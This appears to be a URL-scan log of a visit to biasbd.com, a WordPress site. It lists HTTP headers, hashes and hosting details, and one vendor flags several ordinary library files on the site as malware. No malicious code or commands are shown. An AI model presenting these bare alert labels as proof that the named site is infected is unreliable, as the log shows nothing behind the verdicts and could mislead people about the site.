111.221.45.32 200 OK 6.9 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (30449)
Hash 46a868d47ad97532f60a1419dd340564
726581d97c75b3770c19eade6431ccd14998bed8
4b5980de529a061954353b1d5e52e98902de5cad7c9c167150bad1b67d40ef98
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: text/css
last-modified: Tue, 25 Dec 2018 05:41:36 GMT
etag: "7793-5c21c310-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 6913
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
111.221.45.32 200 OK 617 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (1472), with no line terminators
Hash 2fbb48d9527fa1e38e0bda684e03b478
f5489d09ca4aaaeaac0a601938059dd782043ef8
dc716cc91b204432d809768b298d044089c0ec796cebf4bbaf28a7f3704ea948
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "5c0-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 617
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
111.221.45.32 200 OK 1.0 kB URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (2940), with no line terminators
Hash 39463ba25159d96f7ac01a34f6df86df
0e24012f7c10c1de4ed82a1e16dc0908e505cac7
c5e652e240d2ea0982ea9978a274e3416a574cc82f8a8d31806e64a9fbc92b1d
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "b7c-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1040
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/countto.js?ver=5.2.16
111.221.45.32 200 OK 915 B URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/countto.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash ec069ca5933f06f20307ef566ae76cc2
bb8ad86a394e5dad5af04050a3313cc3838072b5
7c32680bb0afa1ba5219d23cb46e73df4a41196c3dcaa4cd629dc61e31fb8ee4
GET /wp-content/themes/industrial/js/countto.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "a15-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 915
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2
111.221.45.32 200 OK 17 kB URL HTTP/1.1 biasbd.com/wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (51679), with no line terminators
Hash 1fbbbdae15d9c0ba5857b2791ce71a66
814338d39879435491748ebee1cb66674d2010fd
5b4e060984605187cc4b5f653a80c521ca9a74dd6e22249539456b7bf2c43327
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Fri, 19 Oct 2018 04:06:46 GMT
etag: "c9df-5bc95856-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 16894
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/pikaday.js?ver=5.2.16
111.221.45.32 200 OK 8.3 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/pikaday.js?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type Unicode text, UTF-8 text, with CRLF line terminators
Hash b46267a95223fd7baa0aee1931cd6964
9a069968f3edd327183d2426d004e11259baa83b
440f15d6277e6dd3185f6db725cac4fac0bd602f61044d72490ce9ea5b7a0887
GET /wp-content/themes/industrial/js/pikaday.js?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:57 GMT
content-type: application/x-javascript
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "90b5-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 8269
date: Tue, 04 Oct 2022 08:23:57 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8287b853-235b-49f5-9b5c-780827ac695b.jpeg
34.120.237.76 200 OK 9.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8287b853-235b-49f5-9b5c-780827ac695b.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 7b7345414898d451d930431b46d4bd00
a36475a0ec7d7b92593cadd4aa99ca38550f1cd1
79b541c69c78df0e4a4c26438431fd6b52754b589d80e929a4203063712a540c
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8287b853-235b-49f5-9b5c-780827ac695b.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9855
x-amzn-requestid: 15f15a2e-0028-40ac-be8f-8e20c37fd27e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpHuGX7oAMFgDA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5564-5fe693f30c91e4c82c8accb1;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:28 GMT
x-amz-cf-pop: SFO5-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: ngoNHOX6fFTGa1Y_-yFOFUYYYqiLJCQOq3NISbmc3gX21YO0TLxx0w==
via: 1.1 b637bd7696854d7acbf96132dcf53200.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 23:37:00 GMT
etag: "a36475a0ec7d7b92593cadd4aa99ca38550f1cd1"
content-type: image/jpeg
age: 31617
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash ff433c9569a3557d806b1480aeafece9
20bbd46383b85326837f45290ff87df708b3b310
e8e5212b8d90257f23bdb0d1d643b5e7d7528d964056c3a4a269b5e09f409f2d
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19529
Expires: Tue, 04 Oct 2022 13:49:26 GMT
Date: Tue, 04 Oct 2022 08:23:57 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp
34.120.237.76 200 OK 9.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash d8c08f8066cc732de8befd6ccd629a95
22aab05208a01ae5def4d63dc145085630f57bcb
f8a560a0563518d992d0bd2655d2b5c406435a18e874ca00b51374d2ff901770
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9917
x-amzn-requestid: 2dff93d9-795d-4885-9b82-610b0d235a82
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTGEnIAMF1zg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-117afa703663ada75627792c;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: p5nOqBojKO6S-c_DxIu8B3p-NK0pzRHkz0DOPeyv7PQt9h0x1jdtoQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:54 GMT
age: 37683
etag: "22aab05208a01ae5def4d63dc145085630f57bcb"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg
34.120.237.76 200 OK 6.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 206fb65e75dbadf119512f71e0b78402
58ff0bf8ce7528b303d28bab01a80ad721705569
56c8d5f3b3060ee54bf81995269b86c070855d8c33bf437161339a45b309703f
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6315
x-amzn-requestid: 6aa75b16-32e4-48a7-9fb0-9e3d5528c2d5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZWSdsHUnIAMFXtw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6338cabd-742d8a436403683e0cd9368f;Sampled=0
x-amzn-remapped-date: Sat, 01 Oct 2022 23:18:21 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 5sAzc5Ewv4g6Wqq6JJiLylG3Jyy_nlWrr5Oteeo6ebEgq7Rvss4XaQ==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 09331f0822fc98eebaf04130a83dbd44.cloudfront.net (CloudFront), 1.1 google
date: Tue, 04 Oct 2022 04:42:53 GMT
age: 13264
etag: "58ff0bf8ce7528b303d28bab01a80ad721705569"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg
34.120.237.76 200 OK 8.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 59c6121e6f6cb833939e12585aca131e
5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df
88b8a458ad437bf40d154b21d844ba56530ae05c2f42b417cfb0e6cffcb294e5
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 8308
x-amzn-requestid: 35cc0acc-ac90-4f36-a976-c61c34cfe4fe
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcqNXG3mIAMFujg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5722-112061742493dd5255c3fb00;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:41:54 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: VeeA3FQIKbAt5xmPr99k9gQjGbbwrRLM1lFYWaVIO3TCVM19GUKJaA==
via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:57:01 GMT
age: 37616
etag: "5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8641c47a-9aff-4f73-bb07-6770cbbcc8d6.jpeg
34.120.237.76 200 OK 5.5 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8641c47a-9aff-4f73-bb07-6770cbbcc8d6.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6c6882c60d7ca6f918c77104e3ad1d52
20ef861be49c652a938e0145e4ca3a60159367e2
861f5870990fbd2939d151ae18384cf311e87067ca9a50818efe0c2d51b83088
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8641c47a-9aff-4f73-bb07-6770cbbcc8d6.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 5504
x-amzn-requestid: 37405eb0-5c75-46a9-84c0-e8ed726995d8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpHvHPvoAMF3mg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5564-77fd550b58af612525e74761;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:28 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Ovm2wuk28PygH4EZNEUoPchoHQggWCyXbYHOjMV1tZmfyDrL6PjPZA==
via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 5fe5f2a3903f1378941d92eceaf3fa16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 22:29:19 GMT
age: 35678
etag: "20ef861be49c652a938e0145e4ca3a60159367e2"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9a61745f-0c9b-404a-ba22-0a69cf2f0383.jpeg
34.120.237.76 200 OK 4.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9a61745f-0c9b-404a-ba22-0a69cf2f0383.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 6779181f9c06975f2a662da743893939
585e7146fd24cdc2496b05baafea04091dc541e2
8e9a9f92fd89b7cdce77884ccd76b83ab82d28f125ebfc1cb0d371d4046b7985
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9a61745f-0c9b-404a-ba22-0a69cf2f0383.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 4858
x-amzn-requestid: fb21c414-2994-444a-a838-e643fd05b171
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTEfPoAMFfeQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-593dd8043b0490e7301cac0d;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: SFO5-P2, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: MiSh_FjAciKCaOakY2mM_EHBN1Z6GIDYIP8mwS4ikkrToQN3Ktsv2g==
via: 1.1 773ca14e6bd4bf9244988cb69fc9dca8.cloudfront.net (CloudFront), 1.1 b36bf2c460ac693ce304817aed073112.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:56:46 GMT
age: 37631
etag: "585e7146fd24cdc2496b05baafea04091dc541e2"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 0ac04f7c449093fff4f846a7ae56cd4f
50aeb5664545a0dec4173920a274e906bcbcdf6f
18eff2566317aba7b70ee558e8cba42231eb4eae31e903501dc122c751d6993b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
